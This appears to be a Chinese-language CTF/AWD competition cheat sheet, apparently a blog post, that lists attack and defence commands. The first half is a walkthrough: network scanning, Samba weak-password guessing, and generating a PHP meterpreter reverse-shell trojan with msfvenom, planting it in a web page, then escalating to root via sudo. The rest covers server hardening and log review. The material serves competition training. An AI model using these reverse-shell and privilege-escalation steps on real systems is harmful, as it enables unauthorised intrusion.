扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24   (扫描1~124的IP)

获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)

端口:
    22: ssh
    21: ftp
    23: telnet
    80: http
    433:https
    3306: mysql
若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)

smbclinet '\\192.168.0.104\print$' (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt  (可以获取a.txt文件)

mysql -h 192.168.0.104 -u Admin  -p (连接数据库)
(输入密码)  (密码可能藏在某个文件)

searchsploit Samba smbd 3.x - 4.x (搜索)

dirb http://192.168.0.104 (扫描web)

进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)

msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)

将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞

触发成功后:
msf里shell

提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn('/bin/bash')"
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!

ssh操作

ssh <-p 端口> 用户名@IP  //登录
scp 文件路径  用户名@IP:存放路径  //向ssh服务器上传输文件

备份web目录
  tar -zcvf web.tar.gz /var/www/html/
用户管理
  w   //查看当前用户
  pkill -kill -t <用户tty>   //踢掉当前登录用户

进程管理

  ps aux | grep pid或者进程名  //查看进程信息

  查看已建立的网络连接及进程
  netstat -antulp | grep EST

  查看指定端口被哪个进程占用
  lsof -i:端口号 或者 netstat -tunlp|grep 端口号

  结束进程命令
  kill PID
  killall <进程名>
  kill -9 <PID>

iptables命令

  封杀某个IP或者ip段,如:123.4.5.6
  iptables -I INPUT -s 123.4.5.6 -j DROP
  iptables -I INPUT -s 123.4.5.1/24 -j DROP

  禁止从某个主机ssh远程访问登陆到本机,如123.4.5.6
  iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP

Mysql数据库操作

  备份mysql数据库
  mysqldump -u 用户名 -p 密码 数据库名 > back.sql  //备份指定数据库
  mysqldump --all-databases > bak.sql    //备份所有数据库

  还原mysql数据库
  mysql -u 用户名 -p 密码 数据库名 < bak.sql

安全检查

  find / *.php -perm 4777    //查找777的权限的php文件
  awk -F: '{if($3==0)print $1}' /etc/passwd  //查看root权限的账号
  crontab -l  //查看计划任务

  检测所有的tcp连接数量及状态
  netstat -ant|awk '{print $5 "\t" $6}' |grep "[1-9][0-9]*\."|sed -e 's/::ffff://' -e 's/:[0-9]*//'|sort|uniq -c|sort -rn

  查看页面访问排名前十的IP
  cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10

  查看页面访问排名前十的URL
  cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10  

搜寻网站简要信息
  curl --head 网站
  xprobe2 -v 网站
  nmap []
  -A显示详细版本信息
  -v显示详细信息
  -o显示对方操作系统

matego

Web漏洞发现(http扫描)
 webshag
  w3af---(强大专业工具)
  owasp ZAP等同于w3af WEB扫描工具

注入工具
  Sqlmap
  setoolkit(*****很牛工具)

AWD的更多相关文章

  1. CTF线下赛AWD套路小结

    近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一. AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务 ...

  2. 某线下赛AWD

    拿别人比赛的来玩一下,或许这就是菜的力量吧. 0x01 任意文件读取: switch ($row['media_type']) { case 0: // 图片广告 ...... break; case ...

  3. CTF AWD模式攻防Note

    ###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮, ...

  4. CTF线下赛AWD模式下的生存技巧

    作者:Veneno@Nu1L 稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 原文:https://www.anquanke.com/post/id/8467 ...

  5. 代码审计-四叶草杯线下awd比赛源码web2

    今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例 ...

  6. 关于参加AWD攻防比赛心得体会

    今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧  . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后 ...

  7. AWD攻防工具脚本汇总(一)

    最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用   情 ...

  8. Ubunut18 安装docker环境&&AWD攻防平台部署

    docker:有两个版本:docker-ce(社区版)和docker-ee(企业版). 参考官网地址:https://docs.docker.com/engine/installation/linux ...

  9. 线下AWD平台搭建以及一些相关问题解决

    线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加 ...

  10. AWD模式搅屎模式

    AWD模式搅屎模式 ###0x01 出题思路 ####1:题目类型 1-出题人自己写的cms,为了恶心然后加个so. 2-常见或者不常见的cms. 3-一些框架漏洞,比如ph师傅挖的CI这种 #### ...

随机推荐

  1. Oracle编程艺术--配置环境

    如何设置login.sql,参照了本书作者的意见,我也大概弄明白了 只是该文件的存放位置一直就出错,百度了很久,说是$ORACLE_HOME/sqlplus/admin/glogin.sql(默认)于 ...

  2. 阶段1 语言基础+高级_1-3-Java语言高级_06-File类与IO流_04 IO字节流_1_IO概述(概念&分类)

  3. sort_values()和sort_index()函数

    sort_values() 1 可用于对dateframe的多列同时进行排序 True是升序,False是降序,默认是升序 kk.sort_values(by=['listing_id','order ...

  4. dcef3 为按钮添加单击事件

    http://ju.outofmemory.cn/entry/78083 dcef3 为按钮添加单击事件 BccSafe's Blog 2014-06-01 3706 阅读 DOM 演示dcef3操作 ...

  5. javaweb学习总结(十)——HttpServletRequest对象(一) https://www.cnblogs.com/xdp-gacl/p/3798347.html

    一.HttpServletRequest介绍 HttpServletRequest对象代表客户端的请求,当客户端通过HTTP协议访问服务器时,HTTP请求头中的所有信息都封装在这个对象中,通过这个对象 ...

  6. JavaScript 开发的 睡眠状况自测(SRSS)

    Javascript 开发睡眠状况自测程序,手记!2019.11.13日... <script>//初始化fbox = new Findpair('fbox','output');fbox ...

  7. SpringBoot使用RestTemplate基础认证

    SpringBoot使用RestTempate SpringBoot使用RestTemplate摘要认证 SpringBoot使用RestTemplate基础认证 SpringBoot使用RestTe ...

  8. checkbox radio 多次操作失效

    checkbox radio 多次操作失效 , 将attr替换为prop $(this).attr('checked',true); $(this).attr('checked',false); $( ...

  9. java高级开发面试总结

    Java高级工程师面试题总结及参考答案 (转载)博客原文链接:https://www.cnblogs.com/java1024/p/8594784.html 一.面试题基础总结 1. JVM结构原理. ...

  10. 关于toString()和valueOf()以及Object.prototype.toString.call()的结合理解

    一.先说说String(): String()是全局函数,把对象的值转换为字符串. 语法:String(obj); 任何值(对象)都有String()方法,执行过程是这样的:首先,如果该对象上有toS ...